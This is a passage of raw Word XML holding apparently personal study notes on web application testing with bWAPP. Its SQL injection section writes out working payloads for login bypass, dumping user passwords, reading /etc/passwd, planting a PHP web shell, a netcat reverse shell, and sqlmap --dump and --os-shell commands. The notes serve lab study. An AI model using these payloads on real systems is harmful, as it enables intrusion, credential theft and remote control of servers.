        <w:tab/>
        <w:t>User Interface Components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>UI Process Components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Business Layer</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- Webserver &amp; Application Server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Service Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Business workflows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Business Components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data Access Layer</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Behind the Application Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Data Access Components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Data Stores</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- The actual </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F20D17">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server. Manages the</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> storage on the storage device. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Including</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indexing data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Web Testing Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1st thing you need is a browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8" w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>uite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a Web application scanner. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Intercepting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> proxy. Spider. Scanner. Has lots of additional settings...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP ZAP (Zed Attack Proxy)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - More or less the same as Burp</w:t>
      </w:r>
      <w:r w:rsidR="008812E8">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uite. Includes a fuzzer built in to suite, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLinjection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or manipulating data in an attempt to break the application.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Add-ons can be used to assist with pen testing. Need to look into this further. Add-ons literally add on additional functionality to the browser so it can do more than just display websites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**XSS - Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The ability to have scripts execute from inside form fields in web applications. For example entering a command in the name box to steal a cookie from the target computer, this then could be used to access Amazon for example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>persistent</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cross site scripting - used to access data at rest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>persistant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - code needs to be injected into the form when the page is accessed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Very similar to cross-site scripting attack although this is primarily used to target the web application database </w:t>
      </w:r>
      <w:r w:rsidR="00E26AAC">
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:t>server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Entering a command in the name</w:t>
      </w:r>
      <w:r w:rsidR="004011F8">
        <w:t xml:space="preserve"> or password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field which could then du</w:t>
      </w:r>
      <w:r w:rsidR="004011F8">
        <w:t xml:space="preserve">mp a copy of the whole database or allow for authentication bypass. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="008812E8" w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>uite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be used to carry out </w:t>
      </w:r>
      <w:r w:rsidR="004011F8">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="002D46C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLinjection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack for you. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009606AB" w:rsidRPr="009606AB" w:rsidRDefault="009606AB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>will attempt to perform SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="004011F8">
        <w:t xml:space="preserve">. Works as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004011F8">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004011F8">
        <w:t xml:space="preserve"> injection </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004011F8">
        <w:t>fuzzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004011F8">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="007F3B17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3B17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>blah’ OR 6=6 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3B17" w:rsidRDefault="007F3B17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT * FROM users where Username = blah’ OR 6=6 -- AND Password =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C1120" w:rsidRDefault="00CB08B0" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Keep an eye on the URL, maybe it will be possible to manipulate the URL to input a SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00814489" w:rsidRDefault="00814489" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00814489" w:rsidRPr="00E26AAC" w:rsidRDefault="00814489" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AAC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E26AAC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CB08B0" w:rsidRDefault="009B6F4B" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Search for Movie: Iron’ </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6F4B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ORDER BY 1 --</w:t>
      </w:r>
      <w:r w:rsidR="00814489">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">     ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B6F4B" w:rsidRDefault="00814489" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Search for Movie: iron’ UNION all SELECT 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">_name,3,4,5,6,7 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00814489" w:rsidRPr="0081061A" w:rsidRDefault="00814489" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Iron’ union all select 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>,column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">_name,3,4,5,6,7 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r w:rsidR="0081061A" w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.colmns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0081061A" w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0081061A" w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0081061A" w:rsidRPr="0081061A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>=’users’ --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004011F8" w:rsidRDefault="0081061A" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Iron’ union all select 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,log,3,4,password,6,7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from users --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00E26AAC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1’ UNION all SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0081061A" w:rsidRDefault="0081061A" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E26AAC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Blind SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E26AAC">
        <w:t xml:space="preserve">– Use a SLEEP statement to see if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E26AAC">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E26AAC">
        <w:t xml:space="preserve"> hangs. If it hangs then you know the server is accepting your SQL statements. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26AAC" w:rsidRDefault="00B5081F" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B5081F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reading a file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E26AAC">
        <w:t>Iron’ union all select 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E26AAC">
        <w:t>,load</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E26AAC">
        <w:t>_file(“</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”),3,4,5,6,7 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26AAC" w:rsidRDefault="00B546E8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B546E8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Write a file:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B5081F">
        <w:t>Iron’ union all select 1,”Test”</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B5081F">
        <w:t>,3,4,5,6,7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B5081F">
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B5081F">
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B5081F">
        <w:t xml:space="preserve"> ‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B5081F">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B5081F">
        <w:t>/test.txt’ --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26AAC" w:rsidRDefault="000B3678" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Iron’ union all select 1,“&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>($_GET[‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’]);?&gt;”,3,4,5,6,7 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‘/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/documents/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverseshell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B3678" w:rsidRDefault="000B3678" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open a listener </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B3678">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B3678">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B3678">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B3678">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B3678" w:rsidRDefault="000B3678" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>In browser:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B3678" w:rsidRDefault="000748A0" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="000B3678" w:rsidRPr="00467A1D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
          </w:rPr>
          <w:t>http://10.0.0.1/bWAPP/documents/reverseshell.php?cmd=nc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B3678">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000B3678">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000B3678">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 –e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26AAC" w:rsidRDefault="00E26AAC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B5830" w:rsidRDefault="008B5830" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="008B5830">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to capture the traffic to see what SQL statements are being made.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E26AAC" w:rsidRDefault="008B5830" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –cookie=”PASTE IN THE COOKIE” –data=“SEARCH STRING DATA” –u “URL OF SITE” --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6CFE" w:rsidRDefault="003C6CFE" w:rsidP="003C6CFE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C6CFE" w:rsidRDefault="003C6CFE" w:rsidP="003C6CFE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –cookie=”PASTE IN THE COOKIE” –data=“SEARCH STRING DATA” –u “URL OF SITE” –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6CFE" w:rsidRDefault="003C6CFE" w:rsidP="003C6CFE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B546E8" w:rsidRDefault="00B546E8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E26AAC" w:rsidRDefault="00E26AAC" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Cross-Site Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Get a user to perform a function on a web application without them being aware of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="002D46C5" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"GET for POST"</w:t>
      </w:r>
      <w:r w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D46C5" w:rsidRPr="002D46C5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
